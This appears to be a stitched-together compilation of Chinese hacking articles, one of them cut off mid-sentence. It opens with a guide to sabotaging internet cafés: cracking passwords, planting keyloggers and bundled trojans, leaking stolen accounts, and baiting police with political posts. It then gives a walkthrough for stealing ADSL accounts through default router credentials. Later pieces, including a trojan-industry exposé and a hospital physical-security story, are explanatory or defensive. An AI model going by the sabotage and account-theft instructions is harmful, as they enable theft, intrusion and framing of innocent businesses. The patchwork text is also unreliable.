　　网管软件(美萍等)的密码都是可以破解的，黑客站有你需要的资料。不知道就去问资深的黑客吧。他们乐意帮谦虚的你。局域网的共享密码也可以破解了(我也是4月才接触到破解资料)，把破坏延伸都其他的电脑，抗大战果。有空把网吧的代理主机的上网密码也破解出来。简单点就可以安装个“键盘幽灵”等键盘记录软件，什么帐号密码都会无法遁行。破解OICQ密码的软件，多到泛滥。把得到的帐号密码巧妙地公布天下!最好贼赃架祸是网吧泄露出去的!没有安全感的网吧是难有人去消费的，没有消费者是对网吧的最大破坏。  

　　7、木马破坏 在电脑上安装木马可谓历史悠久，破坏经验最多的方法  

　　木马可以遥控网吧的电脑，远程破坏。这样的文章和软件随地是，不浪费时间重复介绍了。最好尽力把木马装到网吧代理上网主机上面。关键是要选对好的木马!用捆绑软件把病毒和木马和主要的软件捆绑起来!(例如IE和OICQ等)。黑客网站和木马网站会令你有新惊喜!

　　8、其他破坏 简单硬件破坏，例如把主机的reset键堵住(等于按住reset不放)，键盘”不小心“进水等

　　来点高风险的，去其他大网站贴不文明的文章，攻击zhengfu的文章，帮网吧引来不少”政治“问题，多贴文章，公安人员就会出手的啦!麻烦大大的有!也可以把电脑做成”跳板“，多些攻击”著名“网站，无论成功是否，IP会给网吧带来麻烦!  

　　9、更多破坏 多些留意电脑类书籍中的故障和维修等文章  

　　里面有太多的经验可以吸收!有很多恼人的破坏方法。上黑客网站了解最新的共防知识!还有充分了解中国的刑法.  

　　在你动手破坏之前，要想好先后次序。最好先去实地踩点，了解第一手详细资料，下次一次过动手。不要经常出入同一网吧，容易引起注意。个人安全一定要做足够。最好做个全屏遮盖的快截键(方式)，预防网吧人员的走近。假如被发现就一定要XXX，(不是小弟强项，不知道写什么好)。  

　　最后，笔者希望大家不要利用这些方法做不正当的事情就是了。  

　　大部分ADSL调制解调器都内置了路由功能，但它的随机软件并不能支持在PPPoE虚拟拨号接入方式下使用该功能，所以很多朋友为了能够多台电脑共同上网，使用了一个外置的路由器，但是这就给黑客留下了可乘之机。  

　　黑客ID：心香燃无眠
　　黑客特长：远程入侵
　　使用工具：SuperScan

　　黑客自白：  

　　使用路由器共享ADSL上网的朋友，最容易忽视的问题就是没有修改路由器的配置密码。一般的路由器在出厂的时候会有一个默认的配置密码。只有知道这个密码，用户才能对路由器进行配置。很多用户在配置自己的路由器之后，并没有修改这个密码。导致网上一些不法之徒可以控制路由器，从而盗窃用户的ADSL账号。  

　　寻找攻击目标  

　　扫描ADSL上网用户的IP段，获取开放80端口的主机列表。如果自己使用的是ADSL上网，那么先拨通自己家的ADSL，然后用ipconfig命令查看自己的IP地址。  

　　一般北京的ADSL上网的用户多为61.49.*.*。获得了自己的IP段之后，就可以找一个好的端口扫描工具了。端口扫描工具有很多，其中支持多线程、体积小、速度快的首推SuperScan。我们这里就使用它作为示范工具。  

　　远程盗取ADSL账号  

　　一般我们在开始地址处输入自己的IP段首地址，即61.49.*.1，结束IP地址 会自动显示出61.49.*.254，对于本网段的IP，即IP地址前3位与自己的IP地址相同的IP，在扫描的时候可以把这些数据设置得短小一些，而对于其他网段的地址，一般需要设置得大一点。

　　下面要设置一下扫描端口，我们在探测路由器的时候只扫描80端口即可。所以单击窗体右上的配置列表，修改Select ports，去掉所有其他端口前的绿钩，最终只保留80端口即可。全部设置好之后，单击Start进行扫描(图1)。  

　　我们可以看到这个网段有两台机器打开了80端口，单击这两台机器左边的“ “号图标，可以显示这两台机器所开发的端口信息。61.49.*.68这台机器开放的是一个IIS的服务器，61.49.*.85这台机器开的是一个302标志，根据经验，我们可以知道这里开放的是一个中兴系列的路由器配置接口。

　　本篇文章我们主要介绍ADSL路由器的安全隐患，这里我们只须在 61.49.*.85上单击右键，选择Web方式浏览即可。  

　　单击之后会出现一个连接配置对话框，点击OK，就可以连接了。通过刚才连接页上的标志，我们可以肯定这是一台中兴831路由器，输入出厂默认的用户名、密码：ZXDSL、ZXDSL，就进入了配置界面(图2)。  

　　ADSL账号轻松到手  

　　点击导航栏上的“quick configur　ation”即可进入快速配置界面，下面用户名已经看到了，密码却显示为小黑点，这怎么办呢?其实也难不倒黑客，单击右键，选择查看源代码。至此，一个ADSL账户就被黑客轻松拿到手了。  

　　英雄帖  

　　本期，我们的黑客高手利用扫描到的信息，轻松盗取了对方的ADSL账号。你能够破掉他这招吗?你的防御招数能够让黑客攻击手段无法成功吗?欢迎你来信告诉我们答案。如果你的答案被我们采纳，你除了获得丰厚稿酬以外，还有可能成为安全明星。安全舞台等着你的激情演出，不要犹豫，赶快行动吧!  

　　曾几何时，在计算机技术人员眼中，黑客还被当成了天才来膜拜。即使到了中国所特有的红客出现，也因为所谓的正义感而尚能被网民接受。但在目前这个几乎全民皆可以做黑客的时代，黑客守则中的不恶意破坏任何系统已无人遵守，黑客精神被彻底抛弃。

　　在赤裸裸的金钱诱惑下，天天都有数不清的人怀着各种目的，前赴后继踏入网络地下世界。Kevin的7天黑客日记，让我们看到了互联网“黑社会”触目惊心的事实：许多人以偷窥为乐，交流着各种木马入侵手段，把肉鸡（被黑客控制的他人电脑）卖给别人，甚至还有所谓的“师父”，制作简单易懂的教程。  

　　Day1萌芽  

　　从大学开始，各种电脑新知识一直是我的兴趣所在，那些黑客、红客、木马、病毒之类的信息就特别能够吸引我。在这方面我没有太多的知识，但看看那些报道也很过瘾。  

　　去年有关DDOS攻击敲诈网站的报道，就引起了我不少兴趣。当时在百度贴吧，我看到灰鸽子群、木马群等非常活跃，每天会有近百篇帖子更新，绝大多数都是有关灰鸽子教学、推销木马软件以及肉鸡销售等内容。当时想想自己没有兴趣攻击和黑掉那些网站，也就只是看看算了。  

　　不过，最近金山和灰鸽子之间的争论又引起了我的兴趣，听说寄生在灰鸽子上下游这个产业链达到了1亿元的规模，让我真的大吃一惊。想想自己现在拼命每个月才赚那么几千块钱，真是有点嫉妒。我对计算机一直有兴趣，我就不相信自己会比那些人差。我想上网看看灰鸽子究竟是怎么回事，我也要去学。

　　Day2寻找 自学  

　　趁着下午上班不忙，我溜达到百度的灰鸽子贴吧中，里面有一个帖子，标题是“90元收徒，教鸽子配置，内外网上线方法，免杀，抓肉鸡，网马配置。”这很吸引我。按照帖子的提示，加入了一个以VISTA SP1为名字的QQ群。

　　当我顺利通过验证进入该群后发现人还真不少，137名成员中有30多人在线，大家正在热火朝天讨论有关双开、肉鸡、代理、扫描等话题，对这些名字我是只知其一不知其二，不管它，反正不耻下问就行了。不少人的名字前面还有“【徒】”的字样，大概是付了钱的标记吧。  

　　在这个QQ群的共享空间中有40种相关教程和工具提供下载，我都下载了，不过大部分都是压缩文件，需要解压密码才能查看使用。听说很多人都是借教木马骗钱的，算了，我还是晚上回家先看看网上的资料自己试试吧，反正网上的黑客网站和软件那么多，不一定要交钱才能学。  

　　Day3联络 付费  

　　昨晚搞了一晚上，看了不少网站，也试用了一些软件，一无所获。那些入侵、扫描的教程和文章说起来都很简单，但我照着操作却死活得不到相同的结果，真是郁闷。看来还是得交钱拜个师父才学得会吧。

　　今天我回到了VISTA SP1群，找到了管理员Paul，他就是大家说的师父。不过看看他的QQ资料显示，年龄为25岁，目前也在上海，和我一样。  

　　当我以菜鸟名义谦虚向Paul请教如何使用灰鸽子以及木马等一系列问题，他显得并不耐烦，只是说自己拥有多年的黑客木马经验，并能编写黑客工具，而且只要拜他为师，可以免费提供各种黑客工具。  

　　好吧，交就交吧，反正只要能学会就行，Paul很爽快地提供了建行和工行的两个账号，让我转90元进任一账户，并留下了一个134的手机号码。下班后我就通过建行ATM机上给Paul转账90.01元，并短信通知了他。

　　Day4拜师 初试

　　昨天晚上我有事，回家已经11点多了，上群看了看，还有10多个人在线，不过师父却不在了。

　　今天又忙碌了一天，但我一直惦记着师父要教我的事情。回到家匆匆扒了几口饭，我就上网去找师父。他说已经收到我交的学费，并正式表示我现在已经是他的徒弟了，而且还让我在名字前面加上了“【徒】”以和其他人区别。  

　　随后师父给了我解压密码，让我先从他自己制作的“内网鸽子上线教程”动画教程开始学起，按照教程操作。虽然是非常傻瓜的操作，但也许是自己太笨了，我操作后并没有取得教程中所说的效果，连灰鸽子远程控制软件都打不开。师父随后利用QQ远程控制功能控制了我的电脑，演示并查了故障原因。据师父分析，估计因为我电脑用的系统是Windows2000，所以才不够稳定。已经晚上10点多了，师父说时间太晚，不愿意继续教了，让我第二天再联系他。  

　　Day5讲解  

　　今天晚上，我换了一台Windows XP的笔记本，和师父再联系，应该没什么问题了吧。果然在师父的QQ远程控制指导下，顺利将灰鸽子服务器软件测试调试上线好。随后师父嘱咐我按照“免杀教程”，将生成的这个服务器软件进行免杀处理，以躲过杀毒软件。  

　　按照教程的方法，我采用4种不同的工具，一步步完成了服务器软件的处理，果然“如愿”逃过了电脑中卡巴斯基的查杀毒处理。呵呵，终于比昨天要顺利了，一步步接近胜利。  

　　以我的计算机知识来看，免杀处理过程应该是在软件中加入大量无关的代码，然后加壳，再进行多次压缩加密，以达到躲过杀毒软件的效果。不过我发现，免杀教程的制作者不是师父，似乎是来自于黑鹰红客基地网站的某位人士，也许他们之间都有交流吧。  

　　完成了灰鸽子服务器软件调试和免杀，终于到了第三步了。按照师父的提示，我开始学习下一步操作———抓肉鸡。但是在看了自动抓肉鸡的教程后，却发现缺少了一个重要的工具。当时师父已经下线了，所以我只能请教仍然在线的师兄。一位好心的师兄告诉我这个工具必须向师父购买，“外面买不到也找不到，是师父自己编的，大概50元吧。”  

　　好吧，既然师父不在，又拿不到工具，那我就再去试试前两天下载的其他黑客工具和教程吧。不过遗憾的是，最后还是没有成功，看来还是得让师父按部就班地教我。  

　　Day6小成 偷窥  

　　第六天了，还是没有找到一台肉鸡，真的有点气馁。不过师父安慰我说，这个事情是急不来的，要有耐心。他还告诉我有些徒弟看了教程，按部就班地学，很快就满师了。  

　　按照教程，我把灰鸽子服务端配置好，再一次做了免杀。并根据网络上找到的教程依次进行端口扫描，弱口令密码扫描。经过3个多小时的等待，终于我的软件中提示已经找到了14台目标电脑。

　　按捺不住激动的心情，照着教程所说的，我远程登陆目标电脑，上传灰鸽子服务端，运行。啊，终于灰鸽子有反应了，目标电脑终于被我控制了，我拥有自己第一台肉鸡了，万岁！我的第一台肉鸡位于四川绵阳，我找到电脑中的图片文件夹。“甘肃图片？”下载看看，原来是位MM在景点的留影啊。继续，继续看看还有没有其他的。  

　　同时我还在继续看那些有漏洞的电脑能不能入侵，结果是4：14，不到30％的成功率，但我已经很满意了。  

　　再入侵一台肉鸡，来自福建，但电脑里好像没什么东西，只有一个联系表，没意思，关了。  

　　另一台肉鸡里面许多与网游有关的文件，应该是个网游玩家吧。看看他在干什么？在打游戏，好，下次等我给他种个网游木马，把装备偷来全部卖掉。

　　对了，听说灰鸽子还能够打开肉鸡的摄像头。试试看，怎么没反应，大概是没安装摄像头或者没插上吧，下次再试试其他肉鸡。

　　不知不觉都凌晨一点多了，虽然明天，不对，应该是今天不上班了，但还是先去睡觉了。  

　　Day7犹豫 放弃

　　今天下午，我把这几天的经历炫耀地告诉了表姐，结果被她好好骂了一顿，因为她就中过灰鸽子，结果重装系统又打了补丁才解决。  

　　可是我才入门，就这样放弃了？回家后看了看全球头号黑客凯文·米特尼克的报道，我发现自己根本就不是一个黑客，只是一个可耻的偷窥者。  

　　在这个群只待了短短六天，看到经常在线的徒弟不下20余名，而且还有一些“学有所成”的徒弟在师父的允许下教授新来的菜鸟，因此每天来加入该群的人也不下20余名。但如果在言语中流露出不想缴费学习的意思，就会被师父和师兄毫不犹豫地踢出该群。师父与几个核心成员的每月收入在万元以上，而这个群建立的时间只有短短4个月。  

　　好吧，我还是放弃这一切吧，这并不是一次光彩的经历。晚上我又一次打开了灰鸽子，删除了肉鸡上的服务器端软件。我决定告别这一切，改邪归正，明天醒来，我还是决定做个好人。  

    幕后调查  

　　猖狂的木马教学  

　　从Kevin的来信及记者随后调查情况来看，木马教学不仅仅只是QQ上一对一的辅导，已经呈现多样化、专业化的态势。  

　　实际上，记者也通过百度贴吧联系上了几位教授木马以及贩卖木马工具的人。其中一个教授者的汇款地址为河南商丘，他给记者展示了自己拥有的各类木马盗号工具的截图后，让记者看着开个价，号称“包教包会”。而且，他还承诺当天晚上就去赶做视频课程。据这个人说，他之所以教人用木马，主要是为自己建网站筹集费用。  

　　而另外一位“教师”，开价就高了许多。从他与记者聊天过程以及所发的帖子中内容来看，他应该是某黑客论坛的版主级以上的人物。他所售卖的黑客工具———黑色××远程控制修正免杀版，从演示动画上分析，功能大致与灰鸽子相当，不过另外加了DDOS的攻击功能。他向记者开价为100元、300元、400元不等，后两个价格档次还承诺软件终身免费更新升级。  

　　除此之外，记者还加入了一个名为“黑客爱好者乐园”的QQ群（群号码为39191700），该群的主持人声称每晚8点在某语音聊天室进行语音教学，内容包括灰鸽子、双开3389、网游木马、高级木马、刷Q、入侵、“黑人”等。而记者在晚上几次进入该聊天室，的确发现这个群的主持人在进行语音教学。

　　除了百度贴吧上面泛滥的教授木马的帖子，有关木马的论坛进入了更隐秘的状态。3月，灰鸽子工作室在一片喊打声中停止网站更新，声称永久关闭，而网上另外两个有关灰鸽子的重要网站也改头换面。比如凤凰灰鸽子论坛更名为凤凰工作室论坛，将以往的开放注册改为邀请注册，只有老会员才能邀请新人进来，旁人更难一窥究竟。虽然这个论坛的内容看上去已经改头换面，但木马、漏洞、免杀等仍然是热议的重要话题。另外一个格子论坛（原名鸽子论坛）已经轰然关闭，页面也打不开了。但是，网上打着安全或者黑客、红客旗号的网站、论坛上，随处可以找到各类黑客教程。  

　　记者观察

　　灰色的1亿元  

　　只要稍微了解电脑以及网络知识的使用者，加上一点耐心，都可以轻易地去玩木马、抓肉鸡、修改系统、偷窥视频、拿到肉鸡电脑中的各种文件，而肉鸡毫无察觉。

　　所以，当灰鸽子工作室辩解称灰鸽子只是一个远程控制软件的时候，理由是那么的苍白无力。其他真正的远程控制软件，比如Pcanywhere、Windows远程桌面、QQ远程协助，都需要被控制者同意才行，并且被控制者电脑上都有明显的提示。而灰鸽子却是千方百计地隐藏自己的痕迹。  

　　实际上，在灰鸽子之前，同样有一款木马在国内也赫赫有名，被很多黑客用来入侵，这款木马就是冰河。身为数据库开发程序员的冰河开发者黄鑫从来没有黑过任何一个网站，甚至在开发测试冰河的时候也是利用自己和朋友的计算机来检验。2003年黄鑫停止了对冰河后续版本的开发，程序员的良知让他不得不面对冰河作为一个黑客工具所带来的危害性。对比之下，灰鸽子开发者的行为是否如其所说只是卖菜刀的，就不言而喻了。  

　　灰鸽子这条所谓的木马灰色产业链是否有1亿元？这无法证实，但就记者所见的一切，却是触目惊心的。编写木马的程序员的收入要远远高于普通的程序员，这是事实。  

　　记者在QQ群中待了几天，看到不分昼夜、不分地域，时刻有人炫耀自己所窃取的肉鸡上的文件，熟悉的黑客之间会讨论是否要搞破坏。可是，当有新人上线来请教问题，“无私”解答者却寥寥。要想人教？要想获得强大的工具？对不起，请掏钱。50元起跳，越多越好。在这些群里，等级森严，师父带徒弟，徒弟带徒孙，一级一级，都被金钱利益牢牢纠集在了一起。  

　　如果说最早的黑客只是为了炫耀技术才入侵网站但从不搞大破坏，让技术爱好者佩服，现在这些玩木马的人，早已经用自己的行动玷污了黑客的头衔，已经毫无道德可言。  

　　 专家视角  

　　法律维权仍为奢望

　　周宾卿（上海市信息服务行业协会顾问律师）  

　　理论上说，参与整个木马黑色产业链各个环节的角色都是违法的，比如那些通过教学徒如何“种木马”并收取费用的“老师”，就可被列为“教唆犯罪”一列，其行为已经形成了“共同犯罪”，其他木马设计、销赃、盗卖等参与者也都难逃其究。  

　　但之所以木马犯罪者最终被绳之以法的少之又少，是因为以现在公安等相关部门还没有对木马产业链的上下游进行完整的追踪，缺乏足够的资源也造成对产业链进行全面调查的侦察成本过高。目前相关部门只能对影响恶劣、后果严重、涉案金额巨大的少数案件进行大规模调查，并将少数主要涉案者送上法庭。至于那些盗取QQ号、破坏个人电脑数据的行为，公安部门甚至不予立案，其实在现实生活中QQ和网游账号被盗者报案而公安机关不予受理的情况，已经屡有发生。  

　　造成这种现状的主要原因是虚拟财产仍无法准确被估值，司法机关很难以盗窃行为为犯罪者定罪，目前木马罪犯常被定下“非法侵入计算机信息系统罪”、“侵犯通信自由”等罪名，在高一级法院未对虚拟财产明确表态的前提下，下一级法院往往遵循过去的做法，绕开虚拟财产的概念为罪犯定罪。

　　普通用户如果想举起法律武器对木马犯罪进行防范，至少在现阶段还是奢望，过高的维权成本和法律条文对虚拟财产的界定还是暂时无法逾越的坎儿。从实际操作来说，建议用户更多采用防火墙、杀毒工具等技术手段对自己的电脑进行防护。

　　首先要说的是国内现在有两种不同类型的网吧，一种是传统的网吧(网吧内的电脑是有主机和分机之分的，所有分机的要求都要经过主机的处理，然后才会到达internet)第二种是DDN网吧，这类网吧没有主机和分机之分，所有在网吧内的电脑是共享一条或多条专线，但每台电脑都有一个静态的IP，而且是直接连接上internet上的。

　　毫无疑问，电子邮件是当今世界上使用最频繁的商务通信工具，据可靠统计显示，目前全球每天的电子邮件发送量已超过500亿条，预计到2008年该数字将增长一倍。

　　电子邮件的持续升温使之成为那些企图进行破坏的人所日益关注的目标。如今，黑客和病毒撰写者不断开发新的和有创造性的方法，以期战胜安全系统中的改进措施。  

　　出自邮件系统的漏洞  

　　典型的互联网通信协议——TCP和UDP，其开放性常常引来黑客的攻击。而IP地址的脆弱性，也给黑客的伪造提供了可能，从而泄露远程服务器的资源信息。  

　　很多电子邮件网关，如果电子邮件地址不存在，系统则回复发件人，并通知他们这些电子邮件地址无效。黑客利用电子邮件系统的这种内在“礼貌性”来访问有效地址，并添加到其合法地址数据库中。

　　防火墙只控制基于网络的连接，通常不对通过标准电子邮件端口(25端口)的通信进行详细审查。  

　　黑客如何发动攻击  

　　一旦企业选择了某一邮件服务器，它基本上就会一直使用该品牌，因为主要的服务器平台之间不具互操作性。以下分别概述了黑客圈中一些广为人知的漏洞，并阐释了黑客利用这些安全漏洞的方式。  

　　一、IMAP 和 POP 漏洞  

　　密码脆弱是这些协议的常见弱点。各种IMAP和POP服务还容易受到如缓冲区溢出等类型的攻击。  

　　二、拒绝服务(DoS)攻击  

　　1.死亡之Ping——发送一个无效数据片段，该片段始于包结尾之前，但止于包结尾之后。

　　2.同步攻击——极快地发送TCP SYN包(它会启动连接)，使受攻击的机器耗尽系统资源，进而中断合法连接。  

　　3.循环——发送一个带有完全相同的源/目的地址/端口的伪造SYN包，使系统陷入一个试图完成TCP连接的无限循环中。

　　三、系统配置漏洞  

　　企业系统配置中的漏洞可以分为以下几类：

　　1.默认配置——大多数系统在交付给客户时都设置了易于使用的默认配置，被黑客盗用变得轻松。  

　　2.空的/默认根密码——许多机器都配置了空的或默认的根/管理员密码，并且其数量多得惊人。  

　　3.漏洞创建——几乎所有

　　黑客入侵的方式有很多种，广义上讲我们可以分为网络入侵和物理入侵，本文就给大家讲一个物理入侵的故事。本文的目的不是教你如何入侵，而是让你看到在这个过程中医院在物理安全方面存在的错误，让大家在了解的同时学会防范。  

　　最近我入侵了一台医院的计算机的系统中。虽然不能更改系统设置、不能修改门诊记录，当然我也不能侵入五角大楼或者发射核导弹，但是我确实能够从未授权的终端发送和接收电子邮件、上网并且随意浏览医院官方的文件。我的经历可以让你注意防范一些简单、低技术含量。  

　　当时是在某天晚上，我的朋友刚在中西部教育医院做了一次外科手术。院方称我需要在等候区等2到3个小时。等候区里的杂志太旧了，我就在空旷昏暗的走廊里到处溜达、打发时间。医院向病人提供免费网络，因此我就向护士打听有公用机器上网的地方。她给我大致指了个方向。  

　　我发现一个桌子上有些小的红绿灯，那边有一间没人的、有台工作站的小房间。我走进去看了看。没有人阻止我进入。可能院方认为这间房子白天人来人往的没有人会随便进去，但是现在所有东西都暴露在那里随意供我取用。  

　　提示：下班时也应注意物理安全。将所有的门都应该锁好。  

　　我动了动键盘。哇!看到操作系统了。根本没有什么有密码保护的屏保程序或者使用提示以及需要认证的警示屏幕。  

　　桌面有个打开的文本文档。它只是个每周日程表，但是在其他状态它也有可能是保密报告。由于用户仍然是登陆状态的，任何路过的人可以复制、修改或者保存该文件。  

　　提示：设置自动的会话超时操作。  

　　开始按钮的功能只是部分禁止的——一些程序无法启动。但是一些本地程序仍然可以使用。IE图标被改了名字，但是我很容易就识别出来了。  

　　于是我点击并启动了浏览器。网络就任我随意使用。  

　　好吧，其实网络差不多是供我随意使用了。医院的系统组拦截了一些站点。我尝试几次后，就明白了它拦截的规律。他们拦截了所有.com .org域名的站点，但是没有屏蔽.edu域的站点。我不能访问1-800-flowers.com但是我能访问几乎所有的学校或大学的网站。(这里我就有个有趣的问题了：医院如何能屏蔽合法用户访问.org域呢?难道他们不想让员工访问像美国医学联盟和医学鉴定处这样的医疗组织吗?)  

　　我有很多学校的邮箱帐户。我查看了一个学校邮箱的邮件并用另一个邮箱发送了电子邮件。我可以查看学生名单，在线申请大学的职位或者预约图书馆的书籍。有些站点通过下载并安装的JAVA小控件来提供安全壳功能。如果我访问了这些站点，我肯定能够远程连接到我的服务器，并利用它绕过屏蔽障碍。  

　　提示：在下班后禁止下载和安装功能。  

　　该工作站连有一台打印机，这就给人搞恶作剧和浪费资源提供了机会。简单的巡逻警卫就可以发现敲键盘或者打印机的异常响动。但实际上只有一个清扫的人经过，而他根本没有注意到我。毫无疑问，他以为我就是那里的员工，正在加班。  

　　提示：跟耳目有关的安全问题。  

　　医院IT系统组采取了锁定他们计算机的措施，但是有太多漏洞让我可以轻易通过。我从当前的系统退出，这样其他人不会对医院造成损失，然后我安静地离开。前台的职员在我出去的时候根本没有问我要访客通行证。  

　　你的站点也会发生这样的事情吗?也许。但是如果办公室的门锁好了，没有人能访问工作站。如果系统有密码保护的屏保程序，那么别人就看不到桌面和文件。如果用户自动退出登录了，那么别人就无法启动本地程序。等等诸如此类的。  

　　提醒：简单、低技术、常识性的预防措施就能防止安全泄露问题。